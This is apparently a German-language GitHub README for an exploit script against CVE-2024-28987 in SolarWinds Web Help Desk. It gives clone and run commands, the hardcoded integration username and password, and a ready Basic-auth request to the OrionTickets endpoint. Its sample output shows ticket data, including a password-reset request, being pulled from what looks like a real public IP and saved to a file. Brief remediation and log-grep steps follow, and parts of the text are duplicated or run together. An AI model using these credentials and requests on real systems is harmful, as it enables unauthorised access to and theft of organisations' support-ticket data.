
**CVE-2024-28987** ist eine kritische Schwachstelle in SolarWinds Web Help Desk (WHD), die es entfernten Angreifern ermöglicht, mithilfe **fest verdrahteter Anmeldedaten** auf sensible Ticketinformationen zuzugreifen. Diese Schwachstelle hat einen **CVSS-Score von 9,1 (Kritisch)** und wird derzeit aktiv in freier Wildbahn ausgenutzt.
⚠️ HAFTUNGSAUSSCHLUSS: Dieses Tool dient ausschließlich Bildungs- und autorisierten Sicherheitstestzwecken. Unautorisierter Zugriff auf Computersysteme ist illegal. Verwenden Sie dieses Tool nur auf Systemen, die Ihnen gehören oder für die Sie eine ausdrückliche Testgenehmigung haben.
CVE-2024-28987 ist eine kritische Schwachstelle in SolarWinds Web Help Desk (WHD), die es Remote-Angreifern ermöglicht, über hartcodierte Anmeldedaten auf sensible Ticketinformationen zuzugreifen. Diese Schwachstelle hat einen CVSS-Score von 9.1 (Kritisch) und wird derzeit aktiv in freier Wildbahn ausgenutzt.
| Attribut | Wert |
|---|---|
| CVE-ID | CVE-2024-28987 |
| CVSS-Score | 9.1 (Kritisch) |
| CWE | CWE-798 (Hartcodierte Anmeldedaten) |
| Betroffene Produkte | SolarWinds Web Help Desk ≤ 12.8.3 Hotfix 1 |
| Patch-Version | 12.8.3 Hotfix 2 |
| Ausnutzung | Aktiv in freier Wildbahn ausgenutzt |
| Aufnahme in CISA KEV | 15. Oktober 2024 |
Ein nicht authentifizierter Angreifer kann:
/OrionTickets-Endpunkt durchführen# Repository klonen
git clone https://github.com/Darabium/CVE-2024-28987.git
cd CVE-2024-28987
# Skript ausführbar machen
Verwendung
bash
# Mit Ziel-URL als Argument
python3 cve-2024-28987.py http://ziel-ip:port
# Interaktiver Modus (fragt nach dem Ziel)
python3 cve-2024-28987.py
# Beispiel mit einem verwundbaren Ziel
python3 cve-2024-28987.py http://192.168.1.100:8098
📊 Ausgabebeispiel
bash
$ python3 cve-2024-28987.py http://138.94.193.65:8098
╔══════════════════════════════════════════════════════════════════╗
║ ║
║ ██████╗██╗ ██╗███████╗ ██████╗ ██████╗ ██╗ ██╗███████╗ ║
║ ██╔════╝██║ ██║██╔════╝ ╚════██╗██╔═████╗██║ ██║██╔════╝ ║
║ ██║ ██║ ██║█████╗ █████╔╝██║██╔██║███████║█████╗ ║
║ ██║ ╚██╗ ██╔╝██╔══╝ ██╔═══╝ ████╔╝██║██╔══██║██╔══╝ ║
║ ╚██████╗ ╚████╔╝ ███████╗ ███████╗╚██████╔╝██║ ██║███████╗ ║
║ ╚═════╝ ╚═══╝ ╚══════╝ ╚══════╝ ╚═════╝ ╚═╝ ╚═╝╚══════╝ ║
║ ║
║ CVE-2024-28987 - SolarWinds Web Help Desk ║
║ Schwachstelle durch hartcodierte Anmeldedaten ║
║ ║
╠══════════════════════════════════════════════════════════════════╣
║ GitHub: https://github.com/Darabium ║
╚══════════════════════════════════════════════════════════════════╝
[*] Prüfe http://****:**/helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/
[+] Ziel ist VERWUNDBAR!
[+] 42 Tickets gefunden
======================================================================
[📋] Ticket-Vorschau (Erste 3 Tickets)
======================================================================
Ticket #1
├── ID: 5690
├── Kunde: UBS Portao Vermelho
├── Status: Offen
├── Detail: BOA TARDE ENCAMINHO SOLICITAÇÃO DE MATERIAIS DA ODONTO
Ticket #2
├── ID: 5691
├── Kunde: UBS Centro
├── Status: In Bearbeitung
├── Detail: ALCOOL 70% - Solicitação de material de limpeza
======================================================================
[🔐] Suche nach sensiblen Daten
======================================================================
[!] Mögliche PASSWORT-Daten in Ticket #5723 gefunden
└── detail: Bitte setzen Sie mein Passwort für den Systemzugriff zurück...
[?] Möchten Sie ALLE Tickets in eine Datei extrahieren? [j/N]: j
[*] Speichere unter: 138_94_193_65_8098_tickets.json
[✓] Erfolgreich gespeichert: 138_94_193_65_8098_tickets.json
[*] Dateigröße: 42.847 Bytes
[*] Gesamtzahl Tickets: 42
[*] Fertig!
GitHub: https://github.com/Darabium
📁 Dateistruktur
CVE-2024-28987/
├── cve-2024-28987.py # Haupt-Exploit-Skript
├── README.md # Diese Datei
└── LICENSE # MIT-Lizenz
Ausgabedateien
Wenn Sie Tickets extrahieren, werden die folgenden Dateien erstellt:
138_94_193_65_8098_tickets.json
***_tickets.jsonl 🔍 Technische Details Hartcodierte Anmeldedaten python USERNAME = "helpdeskIntegrationUser" PASSWORD = "dev-C4F8025E7" Betroffener Endpunkt text /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ Beispiel-HTTP-Anfrage http GET /helpdesk/WebObjects/Helpdesk.woa/ra/OrionTickets/ HTTP/1.1 Host: verwundbares-ziel:8098 Authorization: Basic aGVscGRlc2tJbnRlZ3JhdGlvblVzZXI6ZGV2LUM0ZjgwMjVFNw== Content-Type: application/x-www-form-urlencoded 🛡️ Behebung Sofortmaßnahmen Sofort auf SolarWinds Web Help Desk Version 12.8.3 Hotfix 2 oder höher aktualisieren
Protokolle auf verdächtigen Zugriff auf den /OrionTickets-Endpunkt prüfen
Auf unbefugten Zugriff auf Ticketdaten überwachen
Alle Anmeldedaten zurücksetzen, die möglicherweise in Tickets offengelegt wurden
Alle Support-Tickets auf potenzielle Datenlecks überprüfen
Erkennungsbefehle bash
grep -i "OrionTickets" /var/log/webhelpdesk/access.log
grep -i "helpdeskIntegrationUser" /var/log/webhelpdesk/access.log
cat /opt/WebHelpDesk/version.txt 🚨 CISA-KEV-Hinweis Diese Schwachstelle wurde in den Katalog der Bekannten ausgenutzten Schwachstellen (KEV) von CISA aufgenommen. Organisationen sind verpflichtet, bis zur angegebenen Frist zu patchen.
Datum der Aufnahme: 15. Oktober 2024
Erforderliche Maßnahme: Updates gemäß den Anweisungen des Anbieters anwenden
Frist: 5. November 2024 (21 Tage)
📚 Referenzen NVD CVE-2024-28987
CISA-KEV-Katalog
SolarWinds-Sicherheitshinweis
PEP 668 - Externe Umgebungsverwaltung
🤝 Mitwirken Beiträge sind willkommen! Bitte reichen Sie gerne Pull-Requests ein oder eröffnen Sie Issues.
Richtlinien Repository forken
Erstellen Sie Ihren Feature-Branch (git checkout -b feature/AmazingFeature)
Committen Sie Ihre Änderungen (git commit -m 'Add some AmazingFeature')
Pushen Sie den Branch (git push origin feature/AmazingFeature)
Öffnen Sie einen Pull-Request
📝 Lizenz Dieses Projekt ist unter der MIT-Lizenz lizenziert - siehe die LICENSE-Datei für Details.
⚡ Autor Darabium - Erstveröffentlichung - GitHub